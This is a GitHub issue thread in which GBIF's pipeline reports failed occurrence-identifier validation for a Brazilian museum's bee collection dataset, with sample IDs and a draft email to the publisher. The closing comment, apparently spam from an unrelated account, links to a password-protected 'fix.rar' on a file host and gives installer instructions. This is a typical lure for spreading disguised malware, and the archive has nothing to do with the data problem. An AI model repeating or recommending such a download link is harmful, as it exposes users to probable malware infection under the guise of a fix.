### ISSUE TITLE
Identifiers validation failed for dataset MCP - Coleção de Abelhas

### ISSUE THREAD

**Issue by gbif-pipelines** [gbif/ingestion-management#1529]
Identifier validation failed for the dataset [MCP - Coleção de Abelhas](https://registry.gbif.org/dataset/90288ac6-ae3b-4c4e-8d15-a66744d2cc66):
- Crawler attempt: 350
- Publishing organization: [Museu de Ciências e Tecnologia - PUCRS](https://registry.gbif.org/organization/e6c2fab8-8716-48b8-ae62-dacbc73b35b5)
- Publishing country: BRAZIL
- Installation: [speciesLink Network / INCT-HVFF IPT](https://registry.gbif.org/installation/b38ff2b7-c8af-454e-b5af-ee760f0d5bca)
- Number of occurrences indexed for this dataset at the time of the issue: 128447
- Cause: GBIF ID problems exceed 50% threshold: 100% duplicates; 128447 total records; 128447 absent records
- Pipelines execution steps: [http://api.gbif.org/v1/pipelines/history/execution/4084445/step](http://api.gbif.org/v1/pipelines/history/execution/4084445/step)

```
New IDs sample:


```

```
Old IDs sample:

BRA:PUCRS:MCP-ABELHAS:128196
BRA:PUCRS:MCP-ABELHAS:128197
BRA:PUCRS:MCP-ABELHAS:128198
BRA:PUCRS:MCP-ABELHAS:128199
BRA:PUCRS:MCP-ABELHAS:128200
BRA:PUCRS:MCP-ABELHAS:128201
BRA:PUCRS:MCP-ABELHAS:128202
BRA:PUCRS:MCP-ABELHAS:128203
BRA:PUCRS:MCP-ABELHAS:128204
BRA:PUCRS:MCP-ABELHAS:128205
```

<details>
<summary>Publisher email</summary>

Hello,

I am contacting you from the GBIF Secretariat about a dataset published by the [MCP - Coleção de Abelhas](https://registry.gbif.org/dataset/90288ac6-ae3b-4c4e-8d15-a66744d2cc66) : https://doi.org/10.15468/e5pqiq.
We noticed that the occurrenceIDs were changed. We have temporarily paused the ingestions of this dataset.

As you might already know, when an occurrence record has a new occurrenceID for a given dataset, our system considers it to be a new occurrence.
This means that it will be given a new gbifid and a new occurrence URL (like this one: https://www.gbif.org/occurrence/1252968762) and the old gbifid and URL will be deprecated.

In this case, this means that the occurrence URLs would be deprecated when ingesting the newest versions of these datasets.

We would like to check with you if those changes were intentional. Do you know if this is the case?
Please let us know, thanks! We are happy to resume the dataset ingestion.

Note that some users rely on those occurrence URLs and gbifids (like https://bionomia.net for example). In an attempt to improve
the stability of the occurrence URLs and gbifids, we have implemented a warning system to detect these type of changes in datasets (see this news item).
If the data publisher can provide us with a list of old and new occurrenceIDs per record, we can avoid the identifier and URL changes. Could that be an option?

Please let us know if you have any question. Thanks!

All the best,

</details>

You can skip/fix identifier validation using [the registry UI](https://registry.gbif.org/dataset/90288ac6-ae3b-4c4e-8d15-a66744d2cc66/ingestion-history).

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
